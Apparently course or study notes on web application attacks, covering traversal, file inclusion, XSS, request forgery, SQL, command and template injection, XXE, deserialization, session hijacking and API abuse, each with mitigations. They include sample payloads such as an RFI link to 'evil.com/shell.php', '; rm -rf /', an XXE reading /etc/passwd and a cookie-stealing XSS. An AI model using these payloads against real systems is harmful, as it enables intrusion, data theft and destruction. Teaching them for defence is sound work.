Lessons Overview
- Directory Traversals & File Inclusions
- Cross-Site Scripting (XSS)
- Request Forgeries (CSRF & SSRF)
- SQL Injection
- Other Injections (Command, SSTI, XML)
- Arbitrary Code Execution
- Session Hijacking
- API Abuse
- Tools Demos: Gobuster, DirBuster, WPScan, Burp Suite, sqlmap, Postman, OWASP ZAP
Directory Traversals
- Definition: Use
../(or%2E%2E%2F) to navigate above web root. - Web Root: Typically
/var/wwwon Linux. - Attack Process:
- Inject traversal sequences to access files like
../../etc/shadow. - Encode characters to bypass filters.
- Inject traversal sequences to access files like
- Prevention:
- Sanitize/validate inputs; remove
../. - Restrict file access to web root.
- Sanitize/validate inputs; remove
File Inclusion
- RFI (Remote File Inclusion):
- Includes external URLs (e.g.
?file=http://evil.com/shell.php).
- Includes external URLs (e.g.
- LFI (Local File Inclusion):
- Includes local files via traversal (e.g.
?file=../../etc/passwd%00).- the
%00is the null character to end
- the
- Includes local files via traversal (e.g.
- Mitigation: Whitelist valid paths; validate inputs; disable null-byte bypass.
Directory Traversal Tools
- Gobuster: Fast CLI brute-forcing
gobuster dir -u http://192.168.1.10 -w <wordlist> - DirBuster: Java-based recursive enumeration
- WPScan: WordPress-specific scanner
wpscan --url www.vulnerablewp.com --enumerate u
Cross-Site Scripting (XSS)
- Definition: Inject malicious scripts into trusted sites.
- Attack Flow:
- Identify input flaw.
- Craft malicious URL/payload.
- Execute in victim’s browser.
- Types:
- Reflected: payload in URL, one-time aka non-persistent
- Stored: saved in backend, persistent.
- DOM-Based: manipulation via
document.*.- Example:
https://url.com/index.html#default=<script>alert(document.cookie)</script>
- Example:
- Impact: Defacement, cookie theft, form hijacking, malware installation.
- Prevention: Input validation, output encoding, Content Security Policy (CSP).
Request Forgeries
-
CSRF (Cross-Site Request Forgery):
- Trick authenticated users to perform unwanted actions.
- Mitigations: Anti-CSRF tokens, SameSite cookies, re-auth for critical ops.
-
SSRF (Server-Side Request Forgery):
- Coerce server to access internal resources (e.g. AWS metadata).
- Mitigations: Input validation, domain whitelists, network segmentation.
SQL Injection
- Definition: Inject SQL to manipulate queries (SELECT, INSERT, UPDATE, DELETE).
- Example:
OR 1=1bypasses login. - Indicators: Unescaped
',OR 1=1, injected logic. - Prevention: Parameterized queries, input sanitization, WAF.
Injection Attacks
- Command Injection:
- Execute OS commands via unsanitized inputs (e.g.
; rm -rf /). - Prevention: Validate inputs, avoid shell calls.
- Execute OS commands via unsanitized inputs (e.g.
- SSTI (Server-Side Template Injection):
- Unescaped template expressions (e.g. Jinja2
{{7*7}}). - Prevention: Auto-escaping templates, input validation.
- Unescaped template expressions (e.g. Jinja2
- XML Injection (XXE):
- External entities to read files (e.g.
<!ENTITY xxe SYSTEM "file:///etc/passwd">). - Prevention: Disable external entities, schema validation.
- External entities to read files (e.g.
Arbitrary Code Execution
- Deserialization Attacks: Malicious objects in serialized data.
- Serialized data:
{ "order": { "product": "item" "setorderid": "os.system('ls /etc/shadow')" } }
- Serialized data:
- Web Shells: File upload or code execution flaws to deploy interactive shells.
- Prevention: Avoid deserializing untrusted data, strict upload validation, restrict executable permissions, deploy WAF.
Web Session Hijacking
- SID (Session ID): Cookie for user authentication.
- Methods:
- Session Fixation: Pre-set SID before login.
- Session Replay: MITM capture & reuse.
- XSS Theft: Steal cookie via script.
- Social Engineering: Phishing tokens.
- Mitigations: Regenerate SID on login, HTTPS, Secure & HttpOnly flags, session timeouts, re-auth for sensitive actions, log monitoring.
API Abuse
- Definition: Misuse of API endpoints beyond intended use.
- Examples: Data scraping (Cambridge Analytica), JWT tampering.
- Tools: Postman, Burp Suite.
- JWT Risks:
- Structure: Header, Payload (claims), Signature.
- Weak algos (CVE-2015-2951), claim mutation.
- Mitigations: Strong algos (HS256/RS256), signature validation, short TTLs, key rotation.
OWASP ZAP
- Purpose: Open-source web app scanner & proxy.
- Core Features: Intercept, inspect, manipulate traffic.
- Scan Modes:
- Passive: Header/SSL checks without payloads.
- Active: Inject payloads (SQLi, XSS).
- Usage:
- Automated Scan: URL spider + scan.
- Manual Explore: Record authenticated flows.
- HUD: In-browser real-time alerts.
- Integration: CI pipelines for continuous scanning.
- Customization: Scripting & plugins for advanced tests.